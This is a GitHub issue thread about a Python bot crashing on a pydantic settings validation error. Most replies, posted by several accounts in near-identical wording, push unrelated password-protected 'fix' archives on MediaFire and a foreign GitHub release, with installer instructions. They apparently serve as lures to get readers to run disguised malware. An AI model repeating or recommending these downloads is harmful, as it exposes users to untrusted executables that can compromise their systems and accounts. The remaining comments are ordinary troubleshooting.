### ISSUE TITLE
error start bot

### ISSUE THREAD

**Issue by vahidghadim** [sizifart/CEX.IO-Bot#6]
Hi, when I hit start.bat, it gives this error.
It is the same in manual execution.
I changed the Python version from 12.5 to 10.7. The problem still persists.

Activating virtual environment...
Starting the bot...
Traceback (most recent call last):
  File "D:\CEX.io\main.py", line 4, in <module>
    from bot.utils.launcher import process
  File "D:\CEX.io\bot\utils\__init__.py", line 2, in <module>
    from . import launcher
  File "D:\CEX.io\bot\utils\launcher.py", line 10, in <module>
    from bot.config import settings
  File "D:\CEX.io\bot\config\__init__.py", line 1, in <module>
    from .config import settings
  File "D:\CEX.io\bot\config\config.py", line 22, in <module>
    settings = Settings()
  File "D:\CEX.io\venv\lib\site-packages\pydantic_settings\main.py", line 84, in __init__
    super().__init__(
  File "D:\CEX.io\venv\lib\site-packages\pydantic\main.py", line 171, in __init__
    self.__pydantic_validator__.validate_python(data, self_instance=self)
pydantic_core._pydantic_core.ValidationError: 1 validation error for Settings
MINIMUM_TO_CONVERT
  Input should be a valid number, unable to parse string as a number [type=float_parsing, input_value='False', input_type=str]
    For further information visit https://errors.pydantic.dev/2.6/v/float_parsing
Press any key to continue . . .

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by IgorKonstantinov** [comment]
Bro. You need first time login on phone and convert your balance from old to new game. after converting all well be perfect

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by wmzaru** [comment]
Прокликал кнопку бота, после выключения и повторного запуска выскакивает такая-же ошибка.
Как быть если  большая ферма? Не везде возможно запустить телеграмм, и прокликать кнопку.
